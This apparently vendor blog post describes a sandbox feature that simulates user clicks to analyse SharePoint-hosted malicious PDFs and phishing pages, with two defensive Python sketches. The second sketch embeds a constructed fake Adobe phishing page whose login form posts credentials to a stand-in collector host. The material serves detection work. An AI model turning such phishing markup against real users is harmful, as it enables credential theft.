Engineers have put a lot of work into making today’s websites effortless to browse. When we browse the web, we typically reach the function of a website we want without ever thinking about what we need to click. Websites present their options clearly, and even call us to do various actions with big buttons: sign up, log in, accept cookies, share, learn more. We are already used to website interfaces having their own opinion, and guiding us towards where they want us to go.
For an attacker, this trend is fortunate. It doesn’t stand out when a phishing website asks us to sign in with our credentials; we see this prompt all the time on clean websites. The attacker can also misuse or mimic legitimate web services instead of building their own. These services present the victim with professionally created, familiar interfaces that are easy to navigate without a second thought, which is exactly what the attacker wants.
For a defender, the same trend can be a challenge. Website interfaces are meticulously crafted to make browsing effortless for humans — but not for automation such as security products. A person instinctively knows which button to press without ever thinking about it, but for software it is often hard to decide what a human would do. If the sandbox fails to simulate the victim’s behavior, the data collected during analysis becomes less accurate, which can lead to false verdicts.
In this feature highlight blog post, we discuss VMRay’s approach to solving this problem with Adaptive Browser Simulation. In the context of malicious websites requiring interaction, we can differentiate two categories: websites misusing or copying legitimate services, and websites implementing their own interfaces. We’ll show an example of each, and how Adaptive Browser Simulation handles them.
Attackers often attempt to misuse well-known legitimate services for hosting malware, such as Dropbox, Google Drive, or OneDrive. Hosting malware on these services is temporary, since their providers actively look for malware and remove it. However, the time the malware stays online might be all the time the attacker needs, and during this time they can reap the unique benefits of such file-hosting services: they are free, they provide legitimate-looking URLs that people readily click, and they offer a user experience that is familiar to the victim.
Attackers also don’t have to link files directly, which makes them harder for security solutions to scan. Well-known file-hosting services typically want users to visit their website before serving the file, and they expect people to use the built-in document reader or click a button to download the file rather than linking to it directly.
VMRay’s Adaptive Browser Simulation solves this by recognizing the service, finding the download URL, downloading the file, and submitting it for a second dynamic analysis.
Example: Malware sent via Sharepoint
The relevant part of the attack starts with a Sharepoint URL. When the victim opens the URL, they are presented with a PDF file in an online PDF viewer. The PDF uses a social engineering technique that is common for document malware: it contains a blurred image with a fake error message on top of it. The message suggests clicking a link, which finally leads the victim to a malicious website.
So the stages of the attack are as follows:
Figure 1: Sharepoint’s user interface showing a PDF that contains a malicious URL
A security product needs to peel back the layers: access the Sharepoint site, then reach the PDF, then find the malicious URL inside the PDF.
When this Sharepoint URL is submitted to VMRay for dynamic analysis, the Adaptive Browser Simulation feature understands that this is not just any website, but a file hosted on Sharepoint. It finds a way to download the file, then submits the downloaded PDF for an in-depth analysis. The second analysis extracts the malicious URL from the PDF sample and marks the PDF sample as malicious.
Figure 2: VMRay Analyzer sample page showing the Web Analysis of the Sharepoint URL on top, and the automatically downloaded PDF as a child sample at the bottom
In VMRay, the URL and the PDF are represented as two different samples with a relation between them. The downloaded PDF is the child of the URL it was downloaded from. Since the downloaded file was marked malicious, the URL sample it was downloaded from is also marked as malicious.
Figure 3: VMRay Analyzer sample page of Sharepoint URL with Malicious verdict reached based on the child sample’s malicious verdict
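The two ideas in this section, recognizing a known file-hosting service from the URL and letting a downloaded child sample drive the verdict of the URL it came from, can be sketched in a few dozen lines. The following is an added example written for this post, not VMRay’s code: the hostname list for the services named above is assumed from public knowledge, the SharePoint URL, the PDF bytes and the blocklist are all constructed stand-ins, and the download step is replaced by a dictionary lookup because nothing is fetched from the network.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Hostnames for the file-hosting services the post names. The mapping is assumed
# from public knowledge of these services; the post itself only names them.
HOSTING_SERVICES = {
    "sharepoint.com": "SharePoint",
    "dropbox.com": "Dropbox",
    "drive.google.com": "Google Drive",
    "onedrive.live.com": "OneDrive",
    "1drv.ms": "OneDrive",
}

VERDICT_RANK = {"clean": 0, "suspicious": 1, "malicious": 2}

# Constructed blocklist standing in for the detection that runs on the child sample.
KNOWN_BAD_HOSTS = {"phish.example.invalid"}

# Constructed minimal PDF fragment: a link annotation carrying a URI, which is how a
# "click here" overlay in a document points at the next stage.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Annot /Subtype /Link "
    b"/A << /S /URI /URI (http://phish.example.invalid/login) >> >> endobj\n"
    b"%%EOF\n"
)

# Constructed stand-in for the download step: maps a hosting URL to the file it serves.
HOSTED_FILES = {
    "https://example-my.sharepoint.com/:b:/g/personal/user/invoice.pdf": ("invoice.pdf", SAMPLE_PDF),
}


def identify_hosting_service(url):
    """Return the service name when the URL belongs to a known file-hosting service, else None."""
    host = (urlparse(url).hostname or "").lower()
    for suffix, name in HOSTING_SERVICES.items():
        if host == suffix or host.endswith("." + suffix):
            return name
    return None


@dataclass
class Sample:
    kind: str                      # "url" or "file"
    identifier: str                # the URL, or the file name
    own_verdict: str = "clean"     # verdict from this sample's own analysis
    children: list = field(default_factory=list)
    findings: list = field(default_factory=list)

    def verdict(self):
        """Worst verdict across this sample and every child it produced."""
        worst = self.own_verdict
        for child in self.children:
            if VERDICT_RANK[child.verdict()] > VERDICT_RANK[worst]:
                worst = child.verdict()
        return worst


def extract_pdf_uris(data):
    """Pull URIs out of PDF link annotations (enough for the uncompressed sample above)."""
    return [m.decode("ascii", "replace") for m in re.findall(rb"/URI\s*\(([^)]*)\)", data)]


def analyze_file(name, data):
    """Child analysis: extract embedded URLs and check them against the blocklist."""
    sample = Sample("file", name)
    for uri in extract_pdf_uris(data):
        sample.findings.append(uri)
        if (urlparse(uri).hostname or "").lower() in KNOWN_BAD_HOSTS:
            sample.own_verdict = "malicious"
    return sample


def analyze_url(url, fetch=HOSTED_FILES.get):
    """Parent analysis: recognise the hosting service, fetch the file, analyse it as a child."""
    sample = Sample("url", url)
    service = identify_hosting_service(url)
    if service is None:
        return sample                      # a custom interface needs a different strategy
    sample.findings.append(f"hosted on {service}")
    fetched = fetch(url)
    if fetched is None:
        return sample
    sample.children.append(analyze_file(*fetched))
    return sample


if __name__ == "__main__":
    parent = analyze_url("https://example-my.sharepoint.com/:b:/g/personal/user/invoice.pdf")
    print(parent.identifier, "->", parent.verdict())
    for child in parent.children:
        print("  child", child.identifier, "->", child.verdict(), child.findings)
```

The URL sample’s own analysis finds nothing wrong, which is the whole point: the verdict only becomes malicious because `verdict()` walks the child samples, mirroring the parent/child relation shown in Figure 3. The suffix match in `identify_hosting_service` deliberately requires a dot boundary, so a look-alike host that merely contains a service name is not treated as that service.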
Automating user interaction for known services is easy compared to websites that use a custom interface. Supporting these custom interfaces is constant work, where reaction time to new phishing kits is crucial. With the VMRay Platform’s v4.3 release, VMRay Labs can distribute new browser simulation algorithms within the regular Signature and Detection updates. This makes it possible for VMRay Labs to react quickly to new phishing interfaces even for on-premises customers, significantly shortening the attacker’s window of opportunity.
Example: A phishing page that needs a button click to show the login screen
Sometimes attackers like to let the victim have a choice, such as presenting a screen where the victim can pick a service to log in with. Because the attacker often doesn’t know which services the potential victim uses, it makes sense for the attack to cover as many as possible. With the phishing website in this example, the victim needs to click one of the buttons to reach a login form. Submitting the form sends the credentials to the attacker.
In terms of social engineering methods, this sample is similar to the previous one: to the user it looks like a PDF, and to view it they need to press something and then enter credentials. However, here there is no real PDF; it is just a website with a picture and some buttons on top of it. The Adobe warning is fake, and clicking the button leads the user to a login form.
Figure 4: (Left) phishing webpage with fake Adobe login screen. (Right) legitimate Adobe login screen
With the help of Adaptive Browser Simulation, VMRay finds the “Sign in with Outlook” button, clicks it, and successfully reaches the login form. This provides the defender with more information, and the additional data is often used for more precise phishing detection.
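To make the “find the button a human would press, click it, and look at what is behind it” step concrete, here is an added example of an analysis-side simulation. It is written for this post and is not VMRay’s algorithm: the action-word weights, the two-page site (a fake document overlay with provider buttons, then a credential form), the hostnames and the off-site-posting heuristic are all assumptions or constructed data. Instead of a real browser, a “click” follows the chosen element’s link inside the constructed site.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Words suggesting an element advances the flow a victim is meant to follow.
# The weights are an assumption for this example, not a published ranking.
ACTION_WORDS = {"sign in": 3, "log in": 3, "login": 3, "open": 2, "view": 2,
                "download": 2, "continue": 2, "next": 1}

# Constructed two-page phishing site: a fake document overlay with provider
# buttons, then a credential form that posts to a third host.
SITE = {
    "https://phish.example.invalid/index.html": """
<html><body><img src="blurred-document.png" alt="">
<div class="overlay">Adobe Acrobat: this document is protected. Choose your email provider to view it.</div>
<a class="btn" href="/outlook.html">Sign in with Outlook</a>
<a class="btn" href="/office.html">Sign in with Office 365</a>
<a class="btn" href="/other.html">Other email</a>
<a href="/privacy.html">Privacy policy</a></body></html>""",
    "https://phish.example.invalid/outlook.html": """
<html><body><form method="post" action="https://collector.example.invalid/next.php">
<input type="email" name="email"><input type="password" name="password">
<input type="submit" value="Sign in"></form></body></html>""",
}


class PageParser(HTMLParser):
    """One pass over the HTML: collect clickable elements and credential forms."""
    def __init__(self):
        super().__init__()
        self.clickables, self.forms = [], []
        self._element, self._form = None, None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("a", "button"):
            self._element = {"tag": tag, "href": attrs.get("href"), "text": ""}
        elif tag == "input" and attrs.get("type") in ("submit", "button"):
            self.clickables.append({"tag": tag, "href": None, "text": attrs.get("value", "")})
        elif tag == "form":
            self._form = {"action": attrs.get("action", ""), "has_password": False}
        elif tag == "input" and self._form is not None and attrs.get("type") == "password":
            self._form["has_password"] = True

    def handle_data(self, data):
        if self._element is not None:
            self._element["text"] += data

    def handle_endtag(self, tag):
        if self._element is not None and tag == self._element["tag"]:
            self._element["text"] = " ".join(self._element["text"].split())
            self.clickables.append(self._element)
            self._element = None
        elif tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def parse_page(html):
    parser = PageParser()
    parser.feed(html)
    parser.close()
    return parser


def rank_clickables(clickables):
    """Score each element by the action words in its visible text; drop zero scores."""
    scored = [(sum(w for word, w in ACTION_WORDS.items() if word in el["text"].lower()), el)
              for el in clickables]
    scored.sort(key=lambda pair: pair[0], reverse=True)   # stable, so document order breaks ties
    return [el for score, el in scored if score > 0]


def credential_form_hosts(forms, page_url):
    """Hosts that would receive the password field of each credential form on the page."""
    return [urlparse(urljoin(page_url, f["action"])).hostname
            for f in forms if f["has_password"]]


def simulate(start_url, site=SITE):
    """Pick the most likely 'next step' element, follow it, and inspect where credentials would go."""
    report = {"clicked": None, "landing": start_url, "credential_hosts": [], "posts_offsite": False}
    candidates = rank_clickables(parse_page(site[start_url]).clickables)
    if not candidates or not candidates[0]["href"]:
        return report
    chosen = candidates[0]
    landing = urljoin(start_url, chosen["href"])
    report.update(clicked=chosen["text"], landing=landing)
    landing_html = site.get(landing)
    if landing_html is None:
        return report
    hosts = credential_form_hosts(parse_page(landing_html).forms, landing)
    # A login form that ships the password to a host other than the page's own is a strong phishing signal.
    report.update(credential_hosts=hosts,
                  posts_offsite=any(h != urlparse(landing).hostname for h in hosts))
    return report


if __name__ == "__main__":
    print(simulate("https://phish.example.invalid/index.html"))
```

The simulation never types anything into the form; reaching it is enough. Once the login page is in hand, the analysis gains exactly the extra data the text mentions: the form’s presence, its password field and the host it would post to, which here differs from the page that served it.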
Attackers continuously come up with new, often convincing web interfaces that trick people into providing their credentials. With the Adaptive Browser Simulation feature, VMRay can quickly react, and automatically detect threats that would otherwise require human interaction to reach.